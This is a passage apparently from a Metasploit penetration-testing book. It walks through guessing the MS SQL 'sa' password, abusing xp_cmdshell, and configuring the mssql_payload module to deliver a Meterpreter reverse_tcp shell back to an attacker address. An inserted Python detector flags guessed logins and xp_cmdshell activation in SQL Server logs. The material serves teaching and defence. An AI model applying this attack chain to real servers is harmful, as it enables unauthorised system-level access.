Meterpreter

We select the mssql_login module and point it to the default password word list from Fast-Track. (We discuss Fast-Track in more detail in Chapter 11.) We have successfully guessed the sa password: password123.

NOTE

Fast-Track is a tool created by one of the authors of this book that leverages multiple attacks, exploits, and the Metasploit Framework for payload delivery. One of Fast-Track’s features is its ability to use a brute-forcer to attack and compromise MS SQL automatically.

The xp_cmdshell

By running MS SQL from the sa account, we can execute the stored procedure xp_cmdshell, which lets us interact with the underlying operating system and execute commands. The xp_cmdshell is a built-in stored procedure that ships by default with SQL Server. You can call this stored procedure and have it query and execute underlying operating system calls directly with MS SQL. Think of it as a kind of superuser command prompt that allows you to run anything you want on the operating system. When we gain access to the sa account, we find that the MS SQL server is generally running with SYSTEM-level permissions, which allows us full access as an administrator to both MS SQL and the machine itself.
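As an added defensive example (not from the book or the Metasploit project), the following Python flags the two traces this attack chain leaves in the SQL Server ERRORLOG: a burst of failed sa logins followed by a success from the same client, and xp_cmdshell being switched on through sp_configure (it is off by default on SQL Server 2005 and later, and a sysadmin login such as sa can re-enable it). The log lines are constructed, and the code assumes login auditing is set to record both failed and successful logins.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed SQL Server ERRORLOG excerpt (sample data, not from the book).
# Assumes login auditing records both failed and successful logins.
SAMPLE_LOG = """\
2023-05-01 09:30:00.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2023-05-01 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2023-05-01 10:00:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2023-05-01 10:00:01.70 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.129]
2023-05-01 10:00:02.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.33.129]
2023-05-01 10:00:05.00 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) (?P<src>\S+)\s+(?P<msg>.*)$")
LOGIN_RE = re.compile(r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")
XPCMD_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from (?P<old>\d) to (?P<new>\d)")


def parse(log_text):
    """Yield (timestamp, source, message) for every line in ERRORLOG format."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["src"], m["msg"]


def analyze(log_text, threshold=3, window_s=60):
    """Return alerts for (a) a login success preceded by >= threshold failures
    for the same user from the same client within window_s seconds, and
    (b) any configuration change that turns xp_cmdshell on."""
    alerts = []
    failures = defaultdict(list)  # (user, client) -> timestamps of failed logins
    for ts, src, msg in parse(log_text):
        login = LOGIN_RE.search(msg)
        if login:
            key = (login["user"], login["client"])
            if login["result"] == "failed":
                failures[key].append(ts)
                continue
            recent = [t for t in failures[key] if (ts - t).total_seconds() <= window_s]
            if len(recent) >= threshold:
                alerts.append({"kind": "guessed-login", "user": key[0],
                               "client": key[1], "failures": len(recent)})
            failures[key].clear()  # a success ends the guessing run
            continue
        cfg = XPCMD_RE.search(msg)
        if cfg and cfg["new"] == "1":
            alerts.append({"kind": "xp_cmdshell-enabled", "spid": src})
    return alerts
```

The xp_cmdshell message is the one SQL Server writes whenever sp_configure flips the option, so the check fires regardless of which tool enabled it.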

To get a payload onto the system, we’ll interact with the xp_cmdshell, add a local administrator, and deliver the payload through an executable. David Kennedy and Joshua Drake (jduck) have written a module (mssql_payload) that can be used to deliver any Metasploit payload through xp_cmdshell:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > show options

Module options:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD                       no        The password for the specified username
   RHOST                          yes       The target address
   RPORT         1433             yes       The target port
   USERNAME      sa               no        The username to authenticate as
   UseCmdStager  true             no        Wait for user input before returning from exploit
   VERBOSE       false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.33.129
LHOST => 192.168.33.129